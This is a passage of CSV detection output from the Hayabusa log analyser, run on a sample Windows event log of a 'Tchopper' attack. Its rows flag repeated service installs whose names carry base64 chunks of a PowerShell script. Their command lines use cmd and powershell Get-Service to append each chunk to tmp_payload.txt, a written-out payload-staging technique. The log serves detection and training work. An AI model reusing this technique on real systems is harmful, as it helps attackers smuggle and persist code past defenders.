execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:38.333 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 